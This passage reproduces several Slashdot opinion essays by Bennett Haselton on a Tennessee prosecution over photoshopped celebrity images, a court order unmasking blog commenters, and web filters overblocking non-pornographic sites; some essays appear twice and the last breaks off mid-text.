    Frequent Slashdot contributor Bennett Haselton's essay this week is about "A Tennessee man is arrested for possessing a picture of Miley Cyrus's face superimposed on a nude woman's body. In a survey that I posted on the Web, a majority of respondents said the man violated the law -- except for respondents who say they were good at math in school, who as a group answered the survey differently from everyone else." Continue on to see how.

    On June 24, a Tennessee man was arrested for possessing photos that showed the faces of three underage girls, including Miley Cyrus, superimposed onto the nude bodies of adult women. Assistant District Attorney Dave Denny said of the arrest, "When you have the face of a small child affixed to a nude body of a mature woman, it's going to be the state's position that this is for sexual gratification and that this is simulated sexual activity." The phrase "simulated sexual activity" apparently refers to a Tennessee sex crimes law which states in part: "It is unlawful for any person to knowingly possess material that includes a minor engaged in simulated sexual activity that is patently offensive."

    Assuming this is the crime that the D.A. plans to charge him with, to me it seems obvious that the defendant didn't violate the law as written. For one thing, if the nude women in the pictures were just standing there (and neither the article nor the D.A.'s statement suggests otherwise), then there was no "sexual activity" in the photos of any kind, real or simulated. But even if the nude adult women in the photos had been engaged in sexual activity (even just striking a mildly sexy pose), the law still would not apply, because the law requires an actual minor to actually be engaged in something, even if that "something" is simulated sexual activity. So if a video showed a real minor that appeared to be masturbating or having sex with someone in a manner that was "patently offensive", that could violate the law. (Hopefully the "patently offensive" clause would exclude artistic movies like The Tin Drum, although that defense has not always worked.) But if the girls' faces were simply cut and pasted onto the bodies of the women in the photos, then the minors in question were not "engaged in" anything. The D.A. appears to have confused "material that includes a minor engaged in simulated sexual activity" with "material that simulates a minor engaged in sexual activity". And the D.A.'s statement that "this is for sexual gratification and that this is simulated sexual activity" — clearly implying that the pictures are for sexual gratification and therefore this is "simulated sexual activity" — is ridiculous. The defendant probably used pictures of Miley with her clothes on for "sexual gratification" — does that make the photos "simulated sexual activity"? (Dave Denny's office did not respond to my request for comment.)

    But I was more interested in a different question: What would people in a survey think about whether the defendant violated the law? And, would people who are good at math, answer the question differently from everyone else? And would those people answer the question differently from people who are good at, say, English composition?

    That might seem like an odd twist to put on it. But if you can show that a certain answer correlates with mathematical ability, that indicates something special about that answer. And if you can show that that answer appeals to people with math skills, but not to people with English/writing/composition skills, then that indicates something interesting not just about that answer, but about mathematical ability as well, as opposed to writing ability. Whether that answer is "right" or "wrong" (or whether you think those terms are even meaningful for a legal opinion), it is a fact, not an opinion, that people with self-reported higher math skills are more likely to pick that as the correct choice.

    By contrast, when the D.A. makes a public statement about the criminality of the defendant's actions, the implication is that we should give some weight to his statements because of his qualifications, such as being a member of the bar. But if we were to ask other bar members to decide independently of each other whether the defendant committed a crime, would they converge on the same answer? If not, then why should we listen to him, as opposed to someone else with the same credentials? When an expert cites their credentials in support of an opinion, if it's not true that other experts with the same credentials would back them up on that opinion, I don't think people realize the extent to which there is no there there.

    So in the survey, I described the man's alleged actions and the Tennessee statute, and asked people if they thought he had violated the law. I also asked respondents to rate their math skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor" and to rate their English/composition skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor". The survey was posted on the Amazon Mechanical Turk site, where you can post "tasks" for people to complete in exchange for small payments of, say, 25 cents apiece. Some companies use this for grunt work (like hiring people to review user-submitted profile photos to make sure they don't contain nudity), but I use the site mainly to conduct surveys.

    I think it's unlikely that the Mechanical Turk users are a representative cross-section of the population, but I use it more to find significant relative differences between demographic groups. If 60% of women on the site answer a question one way and 80% of men answer it the other way, that probably suggests that in a real cross-sectional survey of the population, men and women would largely disagree on the answer as well. (The alternative would be that the kind of men and women who use Mechanical Turk are predisposed to answer the question differently along gender lines in a way that average men and women are not, but that seems unlikely.)

    For this survey, I offered users 25 cents apiece for completing this survey and collected 127 responses. The results in a nutshell:

    1. About two-thirds of all respondents (85 out of 127) said that the man did violate the law.
    2. However, among the respondents who rated their own math skills as "Excellent", only 44% (12 out of 27) said he violated the law, and 56% (15 out of 27) said that he did not. Out of all ten ability groupings (five different ability groupings for math, from "Excellent" to "Poor", and five for English), this was the only group where a majority said that the defendant didn't violate the statute.
    3. Respondents who self-rated their English/composition skills as "Excellent", were also more likely than average to vote that the man did not violate the law, but a majority of them still voted that he did.

    These results are significant at the 99% level, which you can check using an online statistical significance calculator. In other words, despite the modest sample size, the answers given by the respondents with self-rated "excellent" math skills are so starkly different from everyone else's, that there's less than a 1 in 100 chance that the difference is due to coincidence. Almost certainly, something about mathematical ability is correlated with a person's likelihood of giving the "not guilty" answer. (At this point I'm going to give in to my bias and hereinafter refer to that as the "right answer.")

    Furthermore, while respondents with "excellent" English/composition skills were also more likely than average to get the right answer (a difference that is also significant at the 99% level, given the collected data), they were considerably less likely to do so, than the users with self-reported "excellent" math skills (again, significant at the 99% level). I tabulated all the responses.

    If I could afford to pay a larger sample, I would investigate whether the effect of "excellent" English/composition skills disappears entirely when you control for math skills. In other words, it's possible that the people with excellent English/composition skills were more likely than average to get the right answer, but only insofar as their English/composition skills were correlated with excellent math ability — and maybe people with "excellent" English/composition skills, but only average math ability, score no better than the average respondents.

    One thing that jumps out at me: Even though 44% of the 27 people with "excellent" math skills said the man did violate the law, when you look at the 58 people who self-reported "very good" math skills, 74% of them said he violated the law. This would appear to confound my original hypothesis that good math skills lead people to converge on the correct answer. But I suspect that many people with self-reported "very good" math grades were probably just good students who studied hard and did the practice problems and got good grades in math, but without necessarily having the insight that makes someone an "excellent" math student. Without that insight, there was no reason to expect them to be better than average at answering a question that has no resemblance to their textbook's practice problems.

    In fact, I suspect that many of the people who self-reported their math skills as "excellent", and who still answered "yes" to the question of whether the man violated the law, probably fell into that studious-but-not-insightful category as well. It would be interesting to test whether if you required respondents to actually answer a math question — not a standard textbook question, but a tricky question that required people to demonstrate an understanding of what is actually going on — if the correlation between correctly answering that question, and "correctly" answering the legal question, is even stronger.

    But what I think is even more important than the correlation of the correct answer with "excellent" math ability, was the significantly lower correlation of the correct answer with "excellent" English skills. I've been saying for years that you can use excellent prose to defend an illogical idea, or you can use poorly crafted prose to defend a good idea, and so if you care about the quality of an idea and its impact on the real world, you have to look at the substance of an argument, not the style. Economics professor Steven Landsburg writes in his forthcoming philosophy book The Big Questions,

    The bane of a college professor's existence is the student who has been taught in a writing course that there is such a thing as good writing, independent of having something to say. Students turn in well-organized grammatically correct prose, with the occasional stylistic flourish in lieu of any logical argument, and don't understand why they've earned grades of zero.

    I call such people "vocabulemics", who seem to think the purpose of a discussion is to vomit up as many SAT vocab prep words as possible, rather than to form a coherent point. I've tried, and I can't think of any coherent point that could be made in order to argue that the Miley photoshopper really did violate the Tennessee law.

    If you're still unconvinced by the results of a survey of mathletes, consider that they do match up well with the comments provided to me by Mark Rasch, a lawyer and computer security specialist with Secure IT Experts and the former head of the Department of Justice Computer Crimes Unit:

    First, an image of a minor engaged in simulated sexual activity is not the same as a simulated minor engaged in sexual activity... In other words, if you posed actual minors, nude, and made it look like they were having sex, it would be a crime, even though there was no "actual" sexual activity. In most other contexts, when the legislature says "simulated sexual activity" they mean real people engaged in what appears to be sex. The government is trying to apply this theory to real sex but simulated minors. I don't think that passes statutory muster.. its not what the statute prohibits... Under that rationale, if you had, for example, a picture of two dogs mating, and glued pictures of kids on the dogs faces, this would be "simulated sexual activity" but would not be prosecutable. Where do you draw the line? Under federal law, you typically draw the line at the use and posing of real kids.

    Depending on how you look at it, you may think that this opinion from credentialed expert Mr. Rasch, vindicates the opinion of the math aficionados who voted that the defendant did not violate the law. I think it's the other way around — the fact that this answer was correlated in the survey responses with mathematical ability, vindicates the opinion of Mr. Rasch.

  29. The Mathletes and the Miley Photoshop

    Features · · posted by CmdrTaco · from the look-what-i-can-do dept. · 555 comments
    Frequent Slashdot contributor Bennett Haselton's essay this week is about "A Tennessee man is arrested for possessing a picture of Miley Cyrus's face superimposed on a nude woman's body. In a survey that I posted on the Web, a majority of respondents said the man violated the law -- except for respondents who say they were good at math in school, who as a group answered the survey differently from everyone else." Continue on to see how.

    On June 24, a Tennessee man was arrested for possessing photos that showed the faces of three underage girls, including Miley Cyrus, superimposed onto the nude bodies of adult women. Assistant District Attorney Dave Denny said of the arrest, "When you have the face of a small child affixed to a nude body of a mature woman, it's going to be the state's position that this is for sexual gratification and that this is simulated sexual activity." The phrase "simulated sexual activity" apparently refers to a Tennessee sex crimes law which states in part: "It is unlawful for any person to knowingly possess material that includes a minor engaged in simulated sexual activity that is patently offensive."

    Assuming this is the crime that the D.A. plans to charge him with, to me it seems obvious that the defendant didn't violate the law as written. For one thing, if the nude women in the pictures were just standing there (and neither the article nor the D.A.'s statement suggests otherwise), then there was no "sexual activity" in the photos of any kind, real or simulated. But even if the nude adult women in the photos had been engaged in sexual activity (even just striking a mildly sexy pose), the law still would not apply, because the law requires an actual minor to actually be engaged in something, even if that "something" is simulated sexual activity. So if a video showed a real minor that appeared to be masturbating or having sex with someone in a manner that was "patently offensive", that could violate the law. (Hopefully the "patently offensive" clause would exclude artistic movies like The Tin Drum, although that defense has not always worked.) But if the girls' faces were simply cut and pasted onto the bodies of the women in the photos, then the minors in question were not "engaged in" anything. The D.A. appears to have confused "material that includes a minor engaged in simulated sexual activity" with "material that simulates a minor engaged in sexual activity". And the D.A.'s statement that "this is for sexual gratification and that this is simulated sexual activity" — clearly implying that the pictures are for sexual gratification and therefore this is "simulated sexual activity" — is ridiculous. The defendant probably used pictures of Miley with her clothes on for "sexual gratification" — does that make the photos "simulated sexual activity"? (Dave Denny's office did not respond to my request for comment.)

    But I was more interested in a different question: What would people in a survey think about whether the defendant violated the law? And, would people who are good at math, answer the question differently from everyone else? And would those people answer the question differently from people who are good at, say, English composition?

    That might seem like an odd twist to put on it. But if you can show that a certain answer correlates with mathematical ability, that indicates something special about that answer. And if you can show that that answer appeals to people with math skills, but not to people with English/writing/composition skills, then that indicates something interesting not just about that answer, but about mathematical ability as well, as opposed to writing ability. Whether that answer is "right" or "wrong" (or whether you think those terms are even meaningful for a legal opinion), it is a fact, not an opinion, that people with self-reported higher math skills are more likely to pick that as the correct choice.

    By contrast, when the D.A. makes a public statement about the criminality of the defendant's actions, the implication is that we should give some weight to his statements because of his qualifications, such as being a member of the bar. But if we were to ask other bar members to decide independently of each other whether the defendant committed a crime, would they converge on the same answer? If not, then why should we listen to him, as opposed to someone else with the same credentials? When an expert cites their credentials in support of an opinion, if it's not true that other experts with the same credentials would back them up on that opinion, I don't think people realize the extent to which there is no there there.

    So in the survey, I described the man's alleged actions and the Tennessee statute, and asked people if they thought he had violated the law. I also asked respondents to rate their math skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor" and to rate their English/composition skills as "Excellent"/"Very good"/"Good"/"Fair"/"Poor". The survey was posted on the Amazon Mechanical Turk site, where you can post "tasks" for people to complete in exchange for small payments of, say, 25 cents apiece. Some companies use this for grunt work (like hiring people to review user-submitted profile photos to make sure they don't contain nudity), but I use the site mainly to conduct surveys.

    I think it's unlikely that the Mechanical Turk users are a representative cross-section of the population, but I use it more to find significant relative differences between demographic groups. If 60% of women on the site answer a question one way and 80% of men answer it the other way, that probably suggests that in a real cross-sectional survey of the population, men and women would largely disagree on the answer as well. (The alternative would be that the kind of men and women who use Mechanical Turk are predisposed to answer the question differently along gender lines in a way that average men and women are not, but that seems unlikely.)

    For this survey, I offered users 25 cents apiece for completing this survey and collected 127 responses. The results in a nutshell:

    1. About two-thirds of all respondents (85 out of 127) said that the man did violate the law.
    2. However, among the respondents who rated their own math skills as "Excellent", only 44% (12 out of 27) said he violated the law, and 56% (15 out of 27) said that he did not. Out of all ten ability groupings (five different ability groupings for math, from "Excellent" to "Poor", and five for English), this was the only group where a majority said that the defendant didn't violate the statute.
    3. Respondents who self-rated their English/composition skills as "Excellent", were also more likely than average to vote that the man did not violate the law, but a majority of them still voted that he did.

    These results are significant at the 99% level, which you can check using an online statistical significance calculator. In other words, despite the modest sample size, the answers given by the respondents with self-rated "excellent" math skills are so starkly different from everyone else's, that there's less than a 1 in 100 chance that the difference is due to coincidence. Almost certainly, something about mathematical ability is correlated with a person's likelihood of giving the "not guilty" answer. (At this point I'm going to give in to my bias and hereinafter refer to that as the "right answer.")

    Furthermore, while respondents with "excellent" English/composition skills were also more likely than average to get the right answer (a difference that is also significant at the 99% level, given the collected data), they were considerably less likely to do so, than the users with self-reported "excellent" math skills (again, significant at the 99% level). I tabulated all the responses.

    If I could afford to pay a larger sample, I would investigate whether the effect of "excellent" English/composition skills disappears entirely when you control for math skills. In other words, it's possible that the people with excellent English/composition skills were more likely than average to get the right answer, but only insofar as their English/composition skills were correlated with excellent math ability — and maybe people with "excellent" English/composition skills, but only average math ability, score no better than the average respondents.

    One thing that jumps out at me: Even though 44% of the 27 people with "excellent" math skills said the man did violate the law, when you look at the 58 people who self-reported "very good" math skills, 74% of them said he violated the law. This would appear to confound my original hypothesis that good math skills lead people to converge on the correct answer. But I suspect that many people with self-reported "very good" math grades were probably just good students who studied hard and did the practice problems and got good grades in math, but without necessarily having the insight that makes someone an "excellent" math student. Without that insight, there was no reason to expect them to be better than average at answering a question that has no resemblance to their textbook's practice problems.

    In fact, I suspect that many of the people who self-reported their math skills as "excellent", and who still answered "yes" to the question of whether the man violated the law, probably fell into that studious-but-not-insightful category as well. It would be interesting to test whether if you required respondents to actually answer a math question — not a standard textbook question, but a tricky question that required people to demonstrate an understanding of what is actually going on — if the correlation between correctly answering that question, and "correctly" answering the legal question, is even stronger.

    But what I think is even more important than the correlation of the correct answer with "excellent" math ability, was the significantly lower correlation of the correct answer with "excellent" English skills. I've been saying for years that you can use excellent prose to defend an illogical idea, or you can use poorly crafted prose to defend a good idea, and so if you care about the quality of an idea and its impact on the real world, you have to look at the substance of an argument, not the style. Economics professor Steven Landsburg writes in his forthcoming philosophy book The Big Questions,

    The bane of a college professor's existence is the student who has been taught in a writing course that there is such a thing as good writing, independent of having something to say. Students turn in well-organized grammatically correct prose, with the occasional stylistic flourish in lieu of any logical argument, and don't understand why they've earned grades of zero.

    I call such people "vocabulemics", who seem to think the purpose of a discussion is to vomit up as many SAT vocab prep words as possible, rather than to form a coherent point. I've tried, and I can't think of any coherent point that could be made in order to argue that the Miley photoshopper really did violate the Tennessee law.

    If you're still unconvinced by the results of a survey of mathletes, consider that they do match up well with the comments provided to me by Mark Rasch, a lawyer and computer security specialist with Secure IT Experts and the former head of the Department of Justice Computer Crimes Unit:

    First, an image of a minor engaged in simulated sexual activity is not the same as a simulated minor engaged in sexual activity... In other words, if you posed actual minors, nude, and made it look like they were having sex, it would be a crime, even though there was no "actual" sexual activity. In most other contexts, when the legislature says "simulated sexual activity" they mean real people engaged in what appears to be sex. The government is trying to apply this theory to real sex but simulated minors. I don't think that passes statutory muster.. its not what the statute prohibits... Under that rationale, if you had, for example, a picture of two dogs mating, and glued pictures of kids on the dogs faces, this would be "simulated sexual activity" but would not be prosecutable. Where do you draw the line? Under federal law, you typically draw the line at the use and posing of real kids.

    Depending on how you look at it, you may think that this opinion from credentialed expert Mr. Rasch, vindicates the opinion of the math aficionados who voted that the defendant did not violate the law. I think it's the other way around — the fact that this answer was correlated in the survey responses with mathematical ability, vindicates the opinion of Mr. Rasch.

  30. Unmasking Blog Commenters Not a Huge Threat To Freedom

    Yro · Court · · posted by Soulskill · from the hiding-behind-the-internet dept. · 105 comments
    Frequent Slashdot contributor Bennett Haselton writes with his take on a recent court decision about the rights of online commenters. "Although a court has ruled that the police can subpoena the identities of users who posted comments in a newspaper's blog, I think this is not as big of a threat to journalistic integrity as it might seem. And in any case when the judge ruled against the privacy rights of 'bloggers,' he didn't actually mean 'bloggers." Read on for the rest of Bennett's thoughts.

    After writing that a Virginia court made an error in saying that spoofing an IP address in e-mail headers was analogous to using a "pseudonym," and that an Ontario court was wrong in saying that an IP address could be subpoenaed by a court because it was no more secret than personal information like a "home address," I think that the latest court ruling against online anonymity — an Illinois judge ordering a newspaper to reveal the identities of people who posted comments on its blog — is not as big of a threat to online privacy, and is not apparently based on any misconceptions about how the Internet works. However, the ruling has the potential to frighten bloggers more than necessary (as well as possibly set a bad precedent for future courts if they don't read the decision closely enough) because the ruling uses the word "bloggers" repeatedly to refer to what everyone else calls "blog commenters."

    Police had asked the Alton Telegraph to reveal the identities of five people who had posted comments in the newspaper's blog which indicated they might have knowledge relevant to an ongoing murder investigation. The newspaper sued to avoid being forced to hand over the commenters' identities, saying that they were "news sources" protected under Illinois's newspaper shield law. Judge Richard Tognarelli ruled that blog commenters did not count as "sources" under the shield law, and allowed the police to go forward in obtaining the identity of two of the commenters, but denied the request to unmask three others, on the grounds that those commenters did not appear to have information relevant to the case.

    To consider the relevant questions separately:

    Is this legally correct?

    Every time I raise a question like this, it provokes the ire of law students and lawyers who say that judges are the real experts on what is legally correct, and it's not appropriate for lay people to comment. As I never tire of saying, if judges are really "experts" in a sense that lay people are not, then it should be possible to put 10 judges in separate rooms, present them with the same facts of the same case, and have most of them independently come to the same conclusion about the correct answer, with a higher degree of accuracy than lay people would be able to reach the same conclusion. If this is not the case, then the judges are not playing the role of "experts" so much as "designated decision-makers," and it's perfectly fair for lay people to analyze whether the judges' reasoning appears correct.

    In this case, the judge simply said that blog commenters are not news "sources" in the sense described by the law. The text of the shield law (735 ILCS 5/8-901) defines a "source" as "the person or means from or through which the news or information was obtained." Now, if you were to parse this super-literally, then the blog commenters could be considered "sources" because they are posting "information" which can be "obtained" by the reporters who later go back and read through the blog comments. But if you were to be that literal about it, then anybody who publishes "information" anywhere at all, including someone who posts a timetable of train departure times on their Web page, could be considered a "source" for information used by a reporter. Clearly the legislature did not intend for the term "source" to include all people who publish information anywhere under the sun (just because that information is technically available to reporters just like it's available to everyone else), or they would have said so. So it seems reasonable to assume that when the law refers to sources from whom reporters "obtain information," it refers to the way in which reporters normally obtain information in their role as reporters obtaining information from sources — that is, the source privately communicating with a reporter with some expectation of anonymity, hoping the reporter can use the information provided for research on a future story. Blog commenters do not fit that definition since (a) they are posting publicly, and (b) they are responding to a story that has already been written.

    The judge also noted that the shield law is not absolute, and even for individuals who are considered "sources" under the law, their interest in maintaining anonymity has to be weighed against the importance of the information being sought. Judge Tognarelli wrote, "The Telegraph has an interest in protecting its online blogger's identities while the State has an interest in prosecuting someone who has allegedly murdered a child." That sounded to me like sarcasm on first reading, but actually I think he's just being logically rigorous.

    So in this case, I think that you really could probably put 10 different judges in separate rooms and present them with the same facts and arguments, and have most of them (although probably not an overwhelming majority) come to the same conclusion. On the other hand, I would bet that you could ask 10 reasonably smart lay people to analyze the case, and about the same proportion of them would come to the same conclusion as well.

    Is this logically correct?

    By that I mean, could the arguments made in this ruling be extended to a conclusion that is clearly absurd?

    Sometimes a ruling can be apparently in line with the law, but would have implications that would be absurd if carried only one step further. For example, in one of my spam cases in Small Claims court where I brought a case on behalf of Peacefire as a Washington corporation that I owned, a judge ruled that I couldn't represent Peacefire because the corporation was a separate legal entity. This would seem to be in line with the legal principle that only lawyers who are licensed to practice law are allowed to represent entities other than themselves; non-lawyers can only represent themselves. But carried one step further, the same principle leads to a conclusion that makes no sense: If corporations cannot be represented in Small Claims court by their owners, then since lawyers are not allowed in Small Claims court either, the logical conclusion would be that corporations cannot be represented by anybody in Small Claims court. By that logic, I (as an individual) could sue a corporation for any reason, and since nobody would be allowed to defend the case, I would have to win by default! Since that conclusion is obviously absurd, at least one of those two rules (the rule against lawyers in Small Claims, or the rule against people in Small Claims representing entities other than themselves) would have to be relaxed, and in the interests of keeping costs down, it makes more sense to let individuals represent corporations that they own. This is probably why every other judge so far has made the opposite ruling, that I am allowed to represent a corporation in Small Claims court if I'm the owner.

    Does Judge Tognarelli's ruling lead to any absurd conclusions? I don't think so. In fact, the opposite conclusion could have led to an absurd result, if the judge had ruled that commenters posting on the newspaper's blog could seek protection as "news sources." If blog commenters were protected for comments they posted on the newspaper's blog, why shouldn't they be protected for comments they post on their own Web site somewhere else, since the two situations are logically equivalent? In both cases, you're speaking to the entire world, not providing information privately to a reporter. By extension, anybody who says anything, anywhere, at any time, would be protected as a "news source" if a reporter could later find a record of what that person said. While there are possibly merits to that idea — that all anonymous speakers should be protected from being unmasked — it's clearly not what the legislature meant, since they were legislating protection for "sources," not "everybody."

    When the judge said "bloggers," did he mean "bloggers"?

    No. This is the biggest flaw in what otherwise appears to be a logically and technically literate ruling: The court repeatedly used "bloggers" to refer to blog commenters:

    "The subpoena seeks identifying information for bloggers who voluntarily left comments on the website..."

    "Here, it is clear that the 'reporter' did not use any information from the bloggers..."

    "The Telegraph has an interest in protecting its online blogger's identities..."

    That's fine as long as everybody understands what the judge really meant. However, if an actual blogger — one who publishes quasi-news articles on a blog and could be considered a reporter in the traditional sense — ever has to use the court system to protect their identity from being unmasked, there is a danger that a court could cite the current case as precedent and say that "bloggers don't count as news sources." I would hope that a future court would read the current decision carefully enough to realize that it refers to blog commenters and not actual bloggers, but there's no guarantee.

    Is this bad for civil liberties?

    It depends. I think that all the court really said was that while bona fide news sources are protected under the shield law, the shield law does not apply to all people who post public information that might potentially be used for a news story someday. That was already the de facto legal situation that most of us were in — if you post something in a public forum that makes the police think you have information that could be relevant to the prosecution of a crime, they can probably get a court to unmask your identity with a subpoena.

    It may be tempting to think that courts should interpret the shield law more broadly, but be careful what you wish for — if the shield law got diluted to the point where it applied to everybody, then that increases the chances that courts would carve out more exceptions to it or the legislature would rescind it, since neither the courts nor the legislature generally think that everybody deserves legally guaranteed anonymity all of the time.

    If you do think that everybody — or, at least, you — deserves guaranteed anonymity for online postings, you can use tools like Tor to make your identity completely untraceable. I would guess that none of the blog commenters in this case went to that trouble.

    In fact, one of the two commenters whose identity was ordered unmasked by the court, used the handle "mrssully." What if that turns out to be a woman whose last name is Sully, and who could have been trivially identified if the police had called the murder defendants' friends and acquaintances and asked, "Hey, who do you think 'Mrs. Sully' is?" The court ruling said that "the Sheriff's Office contacted 117 different individuals regarding the incident" and that "it would be a very expensive and a 'monumental task' to re-interview all of those witnesses." To re-interview all of them, yes. But it would not be a monumental task to have a junior member of the police force call up each of the 117 phone numbers for the witnesses and leave a message saying, "Hey, do you know a 'Mrs. Sully' who is connected to the defendant?" If someone calls back and says Yes, then maybe you've found who you're looking for; if not, then you've only wasted about two hours trying (at sixty seconds per phone number), so go ahead with the subpoena. If it turns out that "Mrs. Sully" is someone who could have been found in this way, then as a taxpayer and as someone who supports law enforcement at least insofar as they're conducting murder investigations, I might reasonably ask why the police didn't do that first.

  31. Worst Censorware Blocks Cannot Be Fixed

    Features · · posted by CmdrTaco · from the speak-the-truth dept. · 420 comments
    Slashdot regular Bennett Haselton writes "The ACLU has targeted a group of Tennessee school districts for blocking websites categorized by a blocking company as 'LGBT.' I hope the ACLU wins, but it may create the mistaken impression that egregious overblocking of websites is easy to fix. On the contrary, the vast majority of errors are hard-coded into the products and cannot be fixed by unblocking a single category." Hit that tantalizingly entitled 'Read More' link to read his essay.

    The ACLU is threatening to sue a group of Tennessee School Districts for using blocking software that blocks sites categorized as "LGBT" — that is, sites themed around lesbian, gay, bisexual or transgender issues that would not be classified as pornographic. Some of the blocked sites include the Gay and Lesbian Alliance Against Defamation and the Human Rights Campaign.

    Legally, the school districts' decision to block these sites seems fairly indefensible. The content being censored is political speech, not illegal to distribute to minors, and as the ACLU points out, by blocking these sites the school districts are engaging in "viewpoint discrimination," since the schools allow access to anti-gay sites like Americans for Truth Against Homosexuality (which, ironically, features a disclaimer saying its content is not suitable for children). But, you never can tell with judges. A judge in Utah once ruled in favor of a school that suspended a student for wearing a t-shirt with the word "Vegan." (Do you think the judge would have made the same ruling if the student's t-shirt had said "Christian"?)

    However, while the ACLU would be right to bring this case, there may be another unintended side effect. By focusing on the fact that the "LGBT" category is enabled to be blocked in these districts, this sets up a contrast with districts that do not have the "LGBT" category enabled, which could lead people to think that such districts are not blocking LGBT sites. This is not the case.

    When a school district buys blocking software, the software comes with an encrypted list of websites listed in different categories; categories like Pornography and Nudity are typically blocked, while categories like LGBT would usually not be. If a site falls into one or more of the blocked categories, then attempts to access that site will be blocked (at least until some reprobates help you get around the filter.) However, it's the blocking company that decides what to put on the list under each category. And even if only categories like "Pornography" are enabled, there are likely to be many non-pornographic sites categorized as "Pornography," and hence blocked wherever that category is turned on.

    When the ACLU of Washington sued the North County Regional Library system for enabling blocking software for all patrons (including adults), they asked me to test the Fortinet Web filter that the library was using. I used a random sample of 100,000 .com and 100,000 .org domains and ran them through an automated script to find 536 .com domains and 207 .org domains that were blocked by Fortinet. Of those, about one out of every eight .com sites categorized as "Pornography" or "Adult Materials," and one of out of every four .org sites blocked in those categories, was a site with content that could not possibly be considered "adult" — some of the sites blocked in these categories included the Dabar Worship Center, the immigrant-rights group Families for Freedom, and the Seattle Women's Jazz Orchestra. Extrapolating these ratios to the set of all .com and .org domains in existence, one could conclude that there were about 71,000 non-pornographic .com sites and 5,800 non-pornographic .org sites blocked by FortiNet as "Pornography" or "Adult Materials" — a number almost certain to grow into six figures when you add in all the sites outside of .com and .org. Years earlier, I had run similar tests for Cyber Patrol and SurfWatch (products which have since been discontinued) and found that an absolute majority of sites blocked by each program were actually non-pornographic, which translated into an estimate of hundreds of thousands of .com and .org sites wrongly classified as "porn."

    Only the blocking companies know for sure how such stupid mistakes end up on their lists, but the most widely accepted explanation is that they use machines to crawl the Web and guess which sites are pornographic, and add those sites to their blacklists without any human intervention. In their early years, the makers of SurfWatch and Cyber Patrol claimed that employees actually did review sites before adding them to their lists, but that claim became increasingly untenable as more and more reports came out of sites being blocked with no adult content on them.

    Nobody has yet done a similar study for the ENA blocking program, but every blocking program that has ever been tested has had a non-trivial error rate that extrapolates to at least hundreds of thousands of non-pornographic websites being blocked under "Pornography" and similar categories. There is no reason to think that the ENA blocker is different; at the very least, if they claim that it is, then the burden of proof should be on them.

    So, the ACLU will probably succeed in persuading the Tennessee Schools Cooperative to stop blocking the "LGBT" category, but that doesn't mean that LGBT sites — or any other category of non-pornographic sites — will no longer be blocked. A student who encounters a blocked LGBT site could request an override, but what if they don't want to "out" themselves as someone who was browsing an LGBT site? Is Tennessee the best place to be known as the "queer who wanted to get around the porn filter"? And there may not be an option of getting an override anyway. Some of the correspondents on Peacefire's mailing list for new proxy sites to get around blockers are teachers who aren't given a password to bypass the blocker on their school's computers.

    Then of course — you know what's coming — there is the other "larger sense" in which unblocking the LGBT category doesn't "fix the problem," which is that there would be no "problem" if we didn't think of teenagers as children instead of adults. You've probably already decided which side you're on in that debate, but consider it as a scientific question instead of a moral one. Do you think there is any objective evidence that teenagers, if they were given the opportunity to have the same rights and responsibilities as adults, would behave differently from adults to a large degree — more differently than, say, men and women behave from each other? The trouble with the "evidence" that we gather from personal interactions is that it's not truly objective — if someone believes that teenagers are immature and adults are not, they're likely to see and remember only the pieces of evidence that confirm that belief. A true double-blind experiment might involve talking to someone through a computer terminal and rating the other person's "maturity" just based on their responses. That's a start, but the trouble with that experiment is that adults tend to know a larger set of words, so a participant might rate the other person as more "mature" because of their large vocabulary, even though having a large vocabulary is completely different from having mature thoughts or logical reasoning skills. A fairer test might be to take a non-native-English-speaking adult and a native-English-speaking young teenager who scored about the same on a test of English vocabulary, and see if participants could tell the difference in maturity between those two test subjects while talking to them through a computer terminal. I am not aware of any experiment along these lines that has been done, but this is the sort of evidence of differences between adults and minors, that would be truly objective.

    Most of the evidence in favor of the innate "adulthood" of teenagers is also anecdotal and not scientific, but it is compelling. As psychologist Robert Epstein has pointed out in The Case Against Adolescence, for thousands of years humans in their early teens were giving birth and raising children of their own. That obviously does not mean that that is a good idea in today's society, it just means that somewhere along the way, we must have lost sight of the level of responsibility that human teenagers are biologically capable of handling. If one of our Stone Age forebears could be brought back to life, he might eventually get used to the Web, but he'd probably always be amused by the idea of Web blockers for teenagers who are older than he was when he was raising his first child.

  32. Worst Censorware Blocks Cannot Be Fixed

    Features · · posted by CmdrTaco · from the speak-the-truth dept. · 420 comments
    Slashdot regular Bennett Haselton writes "The ACLU has targeted a group of Tennessee school districts for blocking websites categorized by a blocking company as 'LGBT.' I hope the ACLU wins, but it may create the mistaken impression that egregious overblocking of websites is easy to fix. On the contrary, the vast majority of errors are hard-coded into the products and cannot be fixed by unblocking a single category." Hit that tantalizingly entitled 'Read More' link to read his essay.

    The ACLU is threatening to sue a group of Tennessee School Districts for using blocking software that blocks sites categorized as "LGBT" — that is, sites themed around lesbian, gay, bisexual or transgender issues that would not be classified as pornographic. Some of the blocked sites include the Gay and Lesbian Alliance Against Defamation and the Human Rights Campaign.

    Legally, the school districts' decision to block these sites seems fairly indefensible. The content being censored is political speech, not illegal to distribute to minors, and as the ACLU points out, by blocking these sites the school districts are engaging in "viewpoint discrimination," since the schools allow access to anti-gay sites like Americans for Truth Against Homosexuality (which, ironically, features a disclaimer saying its content is not suitable for children). But, you never can tell with judges. A judge in Utah once ruled in favor of a school that suspended a student for wearing a t-shirt with the word "Vegan." (Do you think the judge would have made the same ruling if the student's t-shirt had said "Christian"?)

    However, while the ACLU would be right to bring this case, there may be another unintended side effect. By focusing on the fact that the "LGBT" category is enabled to be blocked in these districts, this sets up a contrast with districts that do not have the "LGBT" category enabled, which could lead people to think that such districts are not blocking LGBT sites. This is not the case.

    When a school district buys blocking software, the software comes with an encrypted list of websites listed in different categories; categories like Pornography and Nudity are typically blocked, while categories like LGBT would usually not be. If a site falls into one or more of the blocked categories, then attempts to access that site will be blocked (at least until some reprobates help you get around the filter.) However, it's the blocking company that decides what to put on the list under each category. And even if only categories like "Pornography" are enabled, there are likely to be many non-pornographic sites categorized as "Pornography," and hence blocked wherever that category is turned on.

